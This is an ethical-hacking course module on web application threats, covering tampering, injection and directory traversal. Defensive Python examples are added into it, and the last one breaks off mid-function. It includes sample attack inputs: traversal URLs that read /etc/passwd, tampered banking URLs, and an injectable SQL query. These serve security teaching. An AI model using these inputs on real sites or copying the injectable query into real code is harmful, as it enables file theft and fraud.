Hacking Web Applications. Module 13
Ethical Hacking and Countermeasures
Hacking Web Applications

Ethical Hacking and Countermeasures v8
Module 13: Hacking Web Applications
CEH Exam

Engineered by Hackers. Presented by Professionals.

Module 13 Page 1724 Ethical Hacking and Countermeasures Copyright by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Security News

XSS Attacks Lead Pack As Most Frequent Attack Type
Source: http://www.darkreading.com

Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.

Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF). One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second.

FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.

Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as user names, passwords and credit card details - without the site or user's knowledge. The severity of these attacks is dependent on the sensitivity of the data handled by the vulnerable site and this ranges from personal data found on social networking sites, to the financial and confidential details entered on ecommerce sites amongst others.

A great number of organisations have fallen victim to such attacks in recent years including attacks on PayPal, Hotmail and eBay, the latter falling victim to a single CSRF attack in 2008 which targeted 18 million users of its Korean website. Furthermore in September this year, IT giants Microsoft and Google Chrome both ran extensive patches targeted at securing XSS flaws, highlighting the prevalence of this growing online threat.

"Cross-site attacks are a severe threat to business operations, especially if servers aren't properly prepared," said Chris Hinkley, CISSP - a Senior Security Engineer at FireHost. "It's vital that any site dealing with confidential or private user data takes the necessary precautions to ensure applications remain protected. Locating and fixing any website vulnerabilities and flaws is a key step in ensuring your business and your customers don't fall victim to an attack of this nature. The consequences of which can be significant, in terms of both financial and reputational damage."

The Superfecta attack traffic for Q3 can be broken down as follows:

As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has, however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%) to become the second most likely origin of malicious traffic.

Varied trends among the Superfecta attack techniques are demonstrated between this quarter and last:

During the build up to the holiday season, ecommerce activity ramps up dramatically and cyber-attacks that target website users' confidential data are also likely to increase as a result. As well as cross-site attacks, the other Superfecta attack types, SQL Injection and Directory Traversal, still remain a significant threat despite a slight reduction in frequency this quarter. Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost explains, "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customers' financial information - credit card and debit card details - there's no room for complacency. These organisations need to know that there's an increased likelihood of attack during this time and it's their responsibility to take the necessary steps to stop such attacks."

Copyright 2013 UBM Tech, All rights reserved
www.darkreading.com/security/news/ /firehost-q3-web-application-report-xssattacks-lead-pack-as-most-frequent-attack-type.html
Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrators monitor and manage web applications are described. Finally, web application pen testing is discussed.

This module familiarizes you with:
- How Web Applications Work
- Web Attack Vectors
- Web Application Threats
- Web App Hacking Methodology
- Footprint Web Infrastructure
- Hacking Webservers
- Analyze Web Applications
- Attack Authentication Mechanisms
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web App Client
- Attack Web Services
- Web Application Hacking Tools
- Countermeasures
- Web Application Security Tools
- Web Application Firewall
- Web Application Pen Testing
Module Flow

Web applications are application programs that are accessed over an Internet connection. These applications use HTTP as their primary communication protocol. Attackers target these applications for several reasons, and they are exposed to various attacks. For a clear understanding of "hacking web applications" we divide the concept into these sections:
- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing

Let us begin with the Web App concepts.
Web App Concepts

This section introduces you to the web application and its components, explains how the web application works and its architecture, and provides insight into Web 2.0 applications, vulnerability stacks, and web attack vectors.
Web Application Security Statistics

Source: https://www.whitehatsec.com

According to the WhiteHat Security website statistics report for 2012, cross-site scripting vulnerabilities are found on more web applications than any other vulnerability class. From the graph you can observe that in 2012, cross-site scripting was the most common vulnerability, found in 55% of the web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
FIGURE 13.1: WhiteHat Security Website Statistics Report, 2012 (chart of vulnerability classes: Cross-Site Scripting, Information Leakage, Content Spoofing, Insufficient Authorization, Cross-Site Request Forgery, Brute Force, Predictable Resource Location, SQL Injection, Session Fixation, Insufficient Session Expiration)
Introduction to Web Applications

- Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser
- Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
- Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
- New web technologies such as Web 2.0 provide more attack surface for web application exploitation

Web applications are applications that run on a remote web server and send their output over the Internet. Web 2.0 technologies are used by all applications based on web servers, for communication with users, clients, third-party users, etc. A web application is comprised of many layers of functionality; however, it is usually considered a three-layered architecture consisting of presentation, logic, and data layers. The web architecture relies substantially on the technology popularized by the World Wide Web: Hypertext Markup Language (HTML) and the primary transport medium, Hypertext Transfer Protocol (HTTP).

HTTP is the medium of communication between the server and the client. Typically, it operates over TCP port 80, but it may also communicate over another unused port. Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser. Some of the popular web servers present today are Microsoft IIS, the Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun ONE. Resources are identified by Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content. Since HTTP is stateless, i.e., the protocol does not maintain a session state, requests for resources are treated as separate and unique. Thus, the integrity of a link is not maintained with the client. Cookies can be used as tokens, which servers hand over to clients to allow access to websites, so that users do not have to request a token for each query. However, cookies are not perfect from a security point of view because they can be copied and stored on the client's local hard disk.

Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on web applications and Web 2.0 technologies to support key business processes and improve performance. New web technologies such as Web 2.0 provide more attack surface for web application exploitation. Attackers look for the different types of vulnerabilities that can be discovered in web applications and exploit them to compromise those applications. Attackers also use tools to launch attacks on web applications.
Web Application Components

The components of web applications are listed as follows:

Login: Most websites allow authentic users to access the application by means of a login. To access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com

The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server.

Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.

User Permissions: When a logged-in user requests a web page that his/her user permissions do not allow access to, the application may redirect the user to the login page or to another page.

The Application Content: It is an interactive program that accepts web requests from clients and uses the parameters sent by the web browser to carry out certain functions.

Data Access: Usually the web pages reach the database via a data access library in which all the database details are stored.

The Data Store: It holds the important data that is shared and synchronized between children/threads. This stored information is quite important and necessary for higher levels of the application framework. It is not mandatory that the data store and the web server are on the same network; they can reach each other through the network connection.

Role-level System Security

Application Logic: Usually web applications are divided into tiers, of which the application logic is the middle tier. It receives the request from the web browser and serves it accordingly. The services offered by the application logic include querying and updating the database as well as generating a user interface.

Logout: An individual can shut down or log out of the web application or browser so that the session and the application associated with it end. The application ends either on the initiative of the application logic or automatically when the servlet session times out.
How Web Applications Work

Slide example: a request for news item 6329 produces the query

  SELECT * from news where id = 6329

and returns the row

  ID    Topic  News
  6329  Tech   CNN

Whenever someone clicks or types in the browser, the requested website or content is displayed on the screen of the computer almost immediately, but what is the mechanism behind this? This is the step-by-step process that takes place once a user sends a request for particular content or a website, where multiple computers are involved.

The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynamic content generation technology tools, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information.

Let's see how the user triggers the initial request through the browser to the web application server:

1. First the user types the website name or URL in the browser and the request is sent to the web server.
2. On receiving the request, the web server checks the file extension:
   - If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
   - If the user requests a web page with the extension CFM, CFML, or CFC, then the request must be processed by the web application server. Therefore, the web server passes the user's request to the web application server.
3. The user's request is now processed by the web application server. In order to process the user's request, the web application server accesses the database placed at the third layer to perform the requested task by updating or retrieving the information stored in the database.
4. Once done processing the request, the web application server sends the results to the web server, which in turn sends the results to the user's browser.

FIGURE: Working of Web Application (user, login form, Internet, firewall, web server)
Web Application Architecture

All web applications execute with the help of the web browser as a supporting client. Web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented by the client-side script, while tasks such as storing and gathering the required data are performed by the server-side script. In the following architecture, the clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. Data access is handled by the database layer using cloud services and a database server.

FIGURE: Web Application Architecture
- Clients: web browser, smart phones, web appliance, external web services (via the Internet)
- Presentation Layer: Flash, Silverlight, JavaScript
- Web Server: firewall, HTTP request parser, proxy server, cache, servlet container, resource handler, authentication and login
- Business Layer: application server (J2EE, .NET, COM, XCode, C++, COM+), business logic, legacy application, data access
- Database Layer: cloud services, database server
Web 2.0 Applications

Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:
- Advanced gaming
- Dynamic as opposed to static site content
- RSS-generated syndication
- Social networking sites (Flickr, Facebook, del.icio.us)
- Mash-ups (emails, IMs, electronic payment systems)
- Wikis and other collaborative applications
- Google Base and other free web services (Google Maps)
- Ease of data creation, modification, or deletion by individual users
- Online office software (Google Docs and Microsoft Light)
- Interactive encyclopedias and dictionaries
- Cloud computing websites such as Amazon.com
- Frameworks (Yahoo! UI Library, jQuery)
- Flash-rich interface websites
- Mobile applications (iPhone)
- New technologies like AJAX (Gmail, YouTube)
- Blogs (WordPress)
Vulnerability Stack

Web applications are maintained and accessed through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security devices. All the mechanisms or services employed at each level help the user in one way or another to access the web application securely. When talking about web applications, security is a critical component to be considered because web applications are a major source of attacks. The following vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that makes web applications vulnerable:

FIGURE: Vulnerability Stack
  Custom Web Applications   Business Logic Flaws, Technical Vulnerabilities
  Third Party Components    Open Source / Commercial
  Database                  Oracle / MySQL / MS SQL
  Web Server                Apache / Microsoft IIS
  Operating System          Windows / Linux / OS X
  Network                   Router / Switch
  Security                  IPS / IDS
Web Attack Vectors

- An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome
- Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
- Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack

An attack vector is a method of entering unauthorized systems to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes. Examples of various types of attack vectors:

Parameter manipulation: The attacker provides wrong input values to the web services and gains control over the SQL, LDAP, XPath, and shell commands built from them. When such incorrect values are accepted by the web services, they become vulnerable, and the web applications running on top of those web services are easily attacked.

XML poisoning: Attackers provide manipulated XML documents that, when processed, can disturb the logic of the parsing method on the server. When huge XML documents are processed at the application layer, they can easily be used by the attacker to launch his or her attack and gather information.

Client validation: Most client-side validation has to be backed by server-side authentication. The AJAX routines can be easily manipulated, which in turn opens a way for attackers to carry out SQL injection, LDAP injection, etc. and compromise the web application's key resources.

Server misconfiguration: The attacker exploits the vulnerabilities in the web servers and tries to break the validation methods to get access to the confidential data stored on the servers.

Web service routing issues: SOAP messages are permitted to access different nodes on the Internet by the WS-Routers. Exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints.

Cross-site scripting: Whenever any infected JavaScript code is executed, the targeted browsers can be exploited to gather information for the attacker.
Module Flow

Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code as it relates to security is poor, and another issue is an application with a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.

Figure: Module Flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing.

This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Web Application Threats - 1

Web application threats are not limited to attacks based on URL and port 80. Regardless of the ports, protocols, and OSI layer used, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack. The various types of web application threats are as follows:

Cookie Poisoning
By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for a malicious attack, or steal information from the user's system.

Directory Traversal
Attackers exploit HTTP by using directory traversal and are then able to access restricted directories; they execute commands outside of the web server's root directory.

Unvalidated Input
In order to bypass the security system, attackers tamper with the HTTP requests, URL, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for intruders. Attackers gain access to the victim's system using the information present in cookies. Examples of attacks caused by unvalidated input include SQL injection, cross-site scripting (XSS), buffer overflows, etc.

Cross-site Scripting (XSS)
An attacker bypasses the client's ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Injection Flaws
Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.

SQL Injection
This is a type of attack where SQL commands are injected by the attacker via input data; the attacker can then tamper with the data.

Parameter/Form Tampering
This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man-in-the-middle is one of the examples of this type of attack. Attackers use tools like WebScarab and Paros Proxy for these attacks.

Denial-of-Service (DoS)
A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.

Broken Access Control
Broken access control is a method used by attackers where a particular flaw has been identified related to the access control, where authentication is bypassed and the attacker compromises the network.

Cross-site Request Forgery
The cross-site request forgery method is a kind of attack where an authenticated user is made to perform certain tasks on the web application that an attacker chooses. For example, a user clicks on a particular link sent through an email or chat.

Information Leakage
Information leakage can cause great losses for a company. Hence, all sources such as systems or other network resources must be protected from information leakage by employing proper content filtering mechanisms.

Improper Error Handling
It is necessary to define how the system or network should behave when an error occurs. Otherwise, it may provide a chance for the attacker to break into the system. Improper error handling may lead to DoS attacks.

Log Tampering
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.

Buffer Overflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

Broken Session Management
These attacks occur when security-sensitive credentials such as passwords and other useful material are not properly taken care of. Attackers compromise the credentials through these security vulnerabilities.

Security Misconfiguration
Developers and network administrators should check that the entire stack is configured properly, as security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Missing patches, misconfigurations, use of default accounts, etc. can be detected with the help of automated scanners, and attackers exploit them to compromise web application security.

Broken Account Management
Even authentication schemes that are valid are weakened because of vulnerable account management functions, including account update, forgotten or lost password recovery or reset, password changes, and other similar functions.

Insecure Storage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk, as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
Web Application Threats - 2

Platform Exploits
Various web applications are built using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References
When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place. For example, where a bank account number is made a primary key, there is a good chance it can be compromised by the attacker based on such references.

Insecure Cryptographic Storage
When sensitive data is stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par. Cryptographically very strong encryption methods have to be used. At the same time, care must be taken in storing the cryptographic keys. If these keys are stored in insecure places, then the attacker can obtain them easily and decrypt the sensitive data.

Authentication Hijacking
In order to identify the user, every web application uses user identification such as a user ID and password. Once the attacker compromises the system, various malicious things like theft of services, session hijacking, and user impersonation can occur.

Network Access Attacks
Network access attacks can majorly impact web applications. These can affect the basic level of services within an application and can allow access that standard HTTP application methods would not have.

Cookie Snooping
Attackers use cookie snooping on a victim's system to analyze their surfing habits and sell that information to other attackers, or may use this information to launch various attacks on the victim's web applications.

Web Services Attacks
Web services are process-to-process communications that have special security issues and needs. An attacker injects a malicious script into a web service and is able to disclose and modify application data.

Insufficient Transport Layer Protection
SSL/TLS authentication should be used for authentication on websites, or the attacker can monitor network traffic to steal an authenticated user's session cookie. Various threats such as account theft, phishing attacks, and compromise of admin accounts may follow once systems are compromised.

Hidden Manipulation
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.

DMZ Protocol Attacks
The DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. An attacker who is able to compromise a system that allows other DMZ protocols has access to other DMZs and internal systems. This level of access can lead to:
- Compromise of the web application and data
- Defacement of websites
- Access to internal systems, including databases, backups, and source code

Unvalidated Redirects and Forwards
Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to:
- Session fixation attacks
- Security management exploits
- Failure to restrict URL access
- Malicious file execution

Failure to Restrict URL Access
An application often safeguards or protects sensitive functionality and prevents the display of links or URLs for protection. Attackers access those links or URLs directly and perform illegitimate operations.

Obfuscation Application
Attackers usually work hard at hiding their attacks and avoiding detection. Network and host intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding. Unicode is a method of representing letters, numbers, and special characters so these characters can be displayed properly, regardless of the application or underlying platform in which they are used.

Security Management Exploits
Some attackers target security management systems, either on networks or on the application layer, in order to modify or disable security enforcement. An attacker who exploits security management can directly modify protection policies, delete existing policies, add new policies, and modify applications, system data, and resources.

Session Fixation Attack
In a session fixation attack, the attacker tricks or attracts the user to access a legitimate web server using an explicit session ID value.

Malicious File Execution
Malicious file execution vulnerabilities have been found in most applications. The cause of this vulnerability is unchecked input into the web server. Due to this unchecked input, the attacker's files are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs a rootkit remotely, and in at least some cases, takes complete control over the systems.
Unvalidated Input

Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning.

An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtering, but there are various encoding methods available to attackers. Many HTTP inputs have multiple formats, which makes filtering very difficult. Canonicalization is used to reduce these encodings to a single form and is useful in avoiding such attacks. Web applications that use only a client-side mechanism for input validation can easily be bypassed by attackers. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.

Figure: Unvalidated Input. The browser sends the POST request http://juggyboy.com/login.aspx?user=jason&pass=springfield; the browser input is not validated by the web application, which builds the query

    string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'";

so the modified query reaches the database.
Parameter/Form Tampering

A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products. A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description
Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters. Changed parameters in the form field are the best example of parameter tampering. When a user makes selections on an HTML page, they are stored as form field values and transferred to the web application in the HTTP request. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.

Hidden fields that are invisible to the end user provide status information to the web application. For example, consider a product order form that includes the hidden field as follows:

    <input type="hidden" name="price" value="">

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the combo box as follows:

    <FORM METHOD=POST ACTION="xfermoney.asp">
    Source Account: <SELECT NAME="SrcAcc">
    <OPTION VALUE="">******789</OPTION>
    <OPTION VALUE="">******868</OPTION></SELECT>
    <BR>Amount: <INPUT NAME="Amount" SIZE=20>
    <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
    <BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
    </FORM>

Bypassing
An attacker may bypass the need to choose between two accounts by adding another account into the HTML page source code. The new combo box is displayed in the web browser and the attacker can choose the new account.

HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the URL is requested as follows:

    http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

    http://www.juggybank.com/cust.asp?profile=82&debit=150

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

    http://www.juggybank.com/stat.asp?pg=531&status=view

An attacker can modify the status parameter to delete in order to delete permission for the content:

    http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters allowing access to developer and debugging information.

Figure 13.6: Form Tampering. Tampering with the URL parameters: http://www.juggybank.com/cust.asp?profile=21&debit=2500 is changed to http://www.juggybank.com/cust.asp?profile=82&debit=150. Other parameters can be changed, including attribute parameters: http://www.juggybank.com/stat.asp?pg=531&status=view is changed to http://www.juggybank.com/stat.asp?pg=147&status=delete.
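Server-side checks that defeat the three tampering cases above (profile/debit in the URL, a hidden price field, and the status parameter), as an added example that is not code from the CEH module. The account-owner table, product catalogue, and content-owner table are constructed sample data; juggybank.com and the parameter names come from the module's own URLs.

```python
"""Server-side guards against parameter/form tampering (added example; the
account owners, catalogue and content owners below are constructed data)."""
from urllib.parse import parse_qs, urlsplit

# Constructed sample data. The server, not the client, holds these bindings.
ACCOUNT_OWNERS = {21: "jason", 82: "alice"}      # profile id -> authenticated owner
CATALOGUE_PRICE_CENTS = {"widget": 9990}          # authoritative prices
CONTENT_OWNERS = {531: "jason", 147: "alice"}     # pg id -> author


class TamperingDetected(Exception):
    """Raised when a client-controlled parameter contradicts server-side state."""


def debit_request(session_user: str, url: str) -> tuple:
    """Parse cust.asp?profile=..&debit=.. and enforce account ownership.

    The profile value arrives from the client and is untrusted; the only
    binding that counts is the one between the authenticated session and the
    account held on the server side.
    """
    qs = parse_qs(urlsplit(url).query)
    try:
        profile = int(qs["profile"][0])
        amount = int(qs["debit"][0])
    except (KeyError, IndexError, ValueError):
        raise TamperingDetected("missing or malformed profile/debit parameter")
    if amount <= 0:
        raise TamperingDetected("debit amount must be positive")
    if ACCOUNT_OWNERS.get(profile) != session_user:
        # Worth logging: a logged-in user naming someone else's profile is the
        # signature of the URL tampering shown in the module.
        raise TamperingDetected(f"{session_user} does not own profile {profile}")
    return profile, amount


def debit_is_rejected(session_user: str, url: str) -> bool:
    """True when the request is refused as tampered (convenience for logging/tests)."""
    try:
        debit_request(session_user, url)
    except TamperingDetected:
        return True
    return False


def order_total_cents(form: dict) -> int:
    """Price the order from the catalogue; a client-supplied hidden 'price'
    field is deliberately never read."""
    product = form.get("product")
    if product not in CATALOGUE_PRICE_CENTS:
        raise TamperingDetected("unknown product")
    try:
        qty = int(form.get("qty", "1"))
    except ValueError:
        raise TamperingDetected("malformed quantity")
    if not 1 <= qty <= 100:
        raise TamperingDetected("quantity out of range")
    return CATALOGUE_PRICE_CENTS[product] * qty


def status_allowed(session_user: str, pg: int, status: str) -> bool:
    """stat.asp?pg=..&status=..: anyone may view, only the author may delete.

    The decision comes from the server's owner table, not from whether a
    delete link was shown in the page the user received.
    """
    if status == "view":
        return pg in CONTENT_OWNERS
    if status == "delete":
        return CONTENT_OWNERS.get(pg) == session_user
    return False   # unknown status values are denied, not passed through


if __name__ == "__main__":
    print(debit_request("jason", "http://www.juggybank.com/cust.asp?profile=21&debit=2500"))
    print(debit_is_rejected("jason", "http://www.juggybank.com/cust.asp?profile=82&debit=150"))
    print(order_total_cents({"product": "widget", "qty": "2", "price": "1"}))
    print(status_allowed("jason", 147, "delete"))
```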
Directory Traversal

When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A directory traversal/forceful browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:

- Enumerate the contents of files and directories
- Access pages that otherwise require authentication (and possibly payment)
- Gain secret knowledge of the application and its construction
- Discover user IDs and passwords buried in hidden files
- Locate source code and other interesting files left on the server
- View sensitive data, such as customer information

The following example uses the "../" sequence to back up several directories and obtain a file containing a backup of the web application:

    http://www.targetsite.com/../../../sitebackup.zip

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:

    http://www.targetsite.com/../../../../etc/passwd

Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:

    http://www.juggyboy.com/process.aspx=../../../somedir/somefile
    http://www.juggyboy.com/../../../somedir/somefile

Figure: Directory Traversal. The attacker requests /../../etc/passwd; the vulnerable server code (<?php $theme = 'Jason.php'; ... ?>) uses the supplied path, and the password file (root:...:0:1:System Operator:/:/bin/ksh, daemon:*:1:1::/tmp:, Jason:...:Developer:/home/users/Jason/:/bin/csh) is returned to the attacker.
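How a server can refuse the "../" requests shown above before touching the filesystem, as an added example that is not code from the CEH module. The web root is a constructed temporary directory containing somedir/somefile (the file name from the module's URLs) with a secret.txt placed one level above it.

```python
"""Rejecting directory traversal before the filesystem is touched (added
example, not the module's code; the web root below is a constructed
temporary directory)."""
import os
import tempfile
from urllib.parse import unquote


class TraversalAttempt(Exception):
    """Raised when a request path would resolve outside the web root."""


def resolve_under_root(web_root: str, requested: str) -> str:
    """Map a request path onto the filesystem, refusing anything outside web_root.

    One percent-decoding pass (so ..%2F..%2F is seen for what it is), then
    realpath() to collapse '..' segments and follow symlinks, then a strict
    prefix test against the real web root. Anything still encoded after the
    single pass is treated as an ordinary file name and never decoded again.
    """
    root = os.path.realpath(web_root)
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise TraversalAttempt("NUL byte in request path")
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/\\")))
    if candidate != root and not candidate.startswith(root + os.sep):
        raise TraversalAttempt(f"{requested!r} resolves outside the web root")
    return candidate


def is_safe(web_root: str, requested: str) -> bool:
    """True when the path stays inside the web root (handy for logging/tests)."""
    try:
        resolve_under_root(web_root, requested)
        return True
    except TraversalAttempt:
        return False


def build_demo_root() -> str:
    """Create a constructed web root: somedir/somefile inside it and secret.txt
    one level above, mirroring the module's somedir/somefile example."""
    base = tempfile.mkdtemp(prefix="traversal_demo_")
    root = os.path.join(base, "webroot")
    os.makedirs(os.path.join(root, "somedir"))
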